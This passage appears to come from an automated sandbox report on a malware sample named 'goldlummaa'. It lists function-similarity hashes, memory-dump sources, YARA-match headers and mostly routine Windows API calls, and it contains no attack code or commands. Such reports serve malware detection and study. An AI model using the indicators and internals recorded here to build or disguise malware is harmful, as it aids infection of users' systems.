                                                                                                                  Similarity
                                                                                                                  • API ID: InitializeThunk
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2994545307-0
                                                                                                                  • Opcode ID: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
                                                                                                                  • Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
                                                                                                                  • Opcode Fuzzy Hash: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
                                                                                                                  • Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                  • Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
                                                                                                                  • Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
                                                                                                                  • Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
                                                                                                                  • Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
                                                                                                                  • Opcode Fuzzy Hash: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
                                                                                                                  • Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                  • Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
                                                                                                                  • Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
                                                                                                                  • Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
                                                                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                  • Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                  • Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
                                                                                                                  • Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
                                                                                                                  • Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                  • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                  • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                  • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                  • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                  • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                  • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2084963225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_400000_goldlummaa.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                  • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                  • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                  • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: 8b8982f4cff54ef74cb3c72fd1231421effd4dc068dceae79bb2013b797f0869
                                                                                                                  • Instruction ID: 5466fdd737a7fbec294c30034ab9932f559b524f08aa4aaa507e130d3be4eaaf
                                                                                                                  • Opcode Fuzzy Hash: 8b8982f4cff54ef74cb3c72fd1231421effd4dc068dceae79bb2013b797f0869
                                                                                                                  • Instruction Fuzzy Hash: BB71F672A002056BDF319F94ECD1FAE77A59F45314F29007DE924E7282EB318D42D7A0
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65CB7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00C65CBF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65D48
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00C65D73
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00C65DC8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 901aa07a6c33f52b05f2527f7f30f4ceabd7e9103f20e8f6e6eb28e0ed74c121
                                                                                                                  • Instruction ID: 373f8d96e0cfa2f534a4994ec8ec27b998b9379b347ecedcafd1b45447510522
                                                                                                                  • Opcode Fuzzy Hash: 901aa07a6c33f52b05f2527f7f30f4ceabd7e9103f20e8f6e6eb28e0ed74c121
                                                                                                                  • Instruction Fuzzy Hash: 8141D634A00619ABCF20DF69C8C8A9EBBB5FF45314F248155E9285B392D731EA45CB91
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00C695DD,00C62442,?,00000000,?), ref: 00C6958F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: 3b3de5b394a9cedecce6513b924cc981b61146c7087d0783f16be9b79c0409d8
                                                                                                                  • Instruction ID: 98cae194ae27ed5b32745a9e70ecce2ad716a9fb7a0ecd7dde225fda461a1c8b
                                                                                                                  • Opcode Fuzzy Hash: 3b3de5b394a9cedecce6513b924cc981b61146c7087d0783f16be9b79c0409d8
                                                                                                                  • Instruction Fuzzy Hash: 54212731A01211A7CB328B65ECC4B6E376CDB45771F240220E92BE7290DB30EF45C6E0
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C648A5
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00C648B3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00C648C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 725de0535ace42e70d866c806a2998368d53b82af9aadd04fdb858b053643e63
                                                                                                                  • Instruction ID: c575023244e3af06e1f64c284f72b21b2c7b75ff2912846dc0d4a20a6c2e0a62
                                                                                                                  • Opcode Fuzzy Hash: 725de0535ace42e70d866c806a2998368d53b82af9aadd04fdb858b053643e63
                                                                                                                  • Instruction Fuzzy Hash: DBD0C7315C2A209F93509F74BC0EB5E3EA4EA057513018135F71DD2251DBB449888BA0
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00C67F40,00C65A6B,00C65180), ref: 00C67F57
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C67F65
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C67F7E
                                                                                                                  • SetLastError.KERNEL32(00000000,00C67F40,00C65A6B,00C65180), ref: 00C67FD0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 8a74189e51b89c3074351d0a6cd33e801dacb4d4151ad1106a842894ad1eecc0
                                                                                                                  • Instruction ID: 8c6b828a2233fa19ceceff4cedcc333e5ad65f3e5283d1a91747523029256573
                                                                                                                  • Opcode Fuzzy Hash: 8a74189e51b89c3074351d0a6cd33e801dacb4d4151ad1106a842894ad1eecc0
                                                                                                                  • Instruction Fuzzy Hash: 2901F73260C2126EA73927F5ACC5F2F37A4DF867B97200B2AF128851F0FF514C86A152
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00C688F8
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00C68B71
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: a33235e12cbc26e9dbba7d5efe00df22d6084df152cdab229f4cc5e157f2b500
                                                                                                                  • Instruction ID: bc17f7737182166b46f0cfb2fcaba35794b37869ed93d75e48f587cce775b7ea
                                                                                                                  • Opcode Fuzzy Hash: a33235e12cbc26e9dbba7d5efe00df22d6084df152cdab229f4cc5e157f2b500
                                                                                                                  • Instruction Fuzzy Hash: 8FB18D71800209EFCF38DFA4C8C19AEB7B5FF44314F14465AE9216B252DB31DA5ADB92
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00C71B77,000000FF,?,00C66B21,?,?,00C66BBD,00000000), ref: 00C66A95
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C66AA7
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00C71B77,000000FF,?,00C66B21,?,?,00C66BBD,00000000), ref: 00C66AC9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 7f885fb526d5af4b732cb2fb12da65804ffdd76c34cc392c3750c1522e94d3b9
                                                                                                                  • Instruction ID: cbd08bab87702d7d691c1d7d84a9bb0bccbda58a42d957d290b69aeac26694c5
                                                                                                                  • Opcode Fuzzy Hash: 7f885fb526d5af4b732cb2fb12da65804ffdd76c34cc392c3750c1522e94d3b9
                                                                                                                  • Instruction Fuzzy Hash: 2901F971944619FFCB118F90CC49FBEB7B8FB44B14F044229F826E22D0DB749944CA80
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D5AA
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D673
                                                                                                                  • __freea.LIBCMT ref: 00C6D6DA
                                                                                                                    • Part of subcall function 00C6B3B5: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C63C34,?,?,00C62442,00001000,?,00C623AA), ref: 00C6B3E7
                                                                                                                  • __freea.LIBCMT ref: 00C6D6ED
                                                                                                                  • __freea.LIBCMT ref: 00C6D6FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1096550386-0
                                                                                                                  • Opcode ID: 378db385271b0fd4324fb08c1016b22b4457e60b54522090c9b13dcf6df92fc2
                                                                                                                  • Instruction ID: b07bbc78f9818e0519404f233dc6fb1d30b3467d9987c5d9f83d73e0b77411df
                                                                                                                  • Opcode Fuzzy Hash: 378db385271b0fd4324fb08c1016b22b4457e60b54522090c9b13dcf6df92fc2
                                                                                                                  • Instruction Fuzzy Hash: 7351F3B2B10246AFEB305F65CCC1EBB3BAAEF44314B190829FD1AD6151EB71CD50D661
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFileHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3849164406-0
                                                                                                                  • Opcode ID: 6de21070ea14a6c1a887fde9624166fe325c926e45db808f01cddbfc06e8140a
                                                                                                                  • Instruction ID: 6ff80b9a74b463431307ed1183f65f44a46b8824bbc788efc6f807fd515594ff
                                                                                                                  • Opcode Fuzzy Hash: 6de21070ea14a6c1a887fde9624166fe325c926e45db808f01cddbfc06e8140a
                                                                                                                  • Instruction Fuzzy Hash: 588110B0D0A248CFCB20DFA8D584BAEBBF0BF49305F184529E855A7341D7349A49DF96
                                                                                                                  APIs
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00C6470A
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64729
                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C64757
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647B2
                                                                                                                  • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00C71B20,000000FF,?,00C63552), ref: 00C647C9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 66001078-0
                                                                                                                  • Opcode ID: 6fe296e069d1812f0a180c33912e2a89ed3223f937c4b9a468bb0fa16fcfd438
                                                                                                                  • Instruction ID: cd96d6fa93c394fe8e9d3243885205bc8f1e1a81c3bef37520624b2301cc9c0b
                                                                                                                  • Opcode Fuzzy Hash: 6fe296e069d1812f0a180c33912e2a89ed3223f937c4b9a468bb0fa16fcfd438
                                                                                                                  • Instruction Fuzzy Hash: EF41603590064ADFCB38DF65C8C5AAAB3F5FF0A311B10492AD466D7A81D730FA84CB61
                                                                                                                  APIs
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748), ref: 00C6D20D
                                                                                                                  • GetLastError.KERNEL32(?,00C6D29C,00000000,?,00C7B728,?,?,?,00C6D1D3,00000004,InitializeCriticalSectionEx,00C73740,00C73748,00000000,?,00C68E2C), ref: 00C6D217
                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00C6D23F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000003.00000002.2085655208.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000003.00000002.2085636459.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085678272.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085698530.0000000000C7A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085718140.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000003.00000002.2085737930.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_3_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                  • String ID: api-ms-
                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                  • Opcode ID: e81ebc06310108723d6dad820694ee66253aa793a655dfe7a5c541e6d4e64098
                                                                                                                  • Instruction ID: 5ba8915da9d1fc70d49f0bbdaed256ea752c90e1dee6efcd8f26f3dae21e9299
                                                                                                                  • Opcode Fuzzy Hash: e81ebc06310108723d6dad820694ee66253aa793a655dfe7a5c541e6d4e64098
                                                                                                                  • Instruction Fuzzy Hash: 64E01A70B80208B7EB211B61EC4AF683B649F40B52F144020FE1DE80A1DFB1EED89584
                                                                                                                  APIs
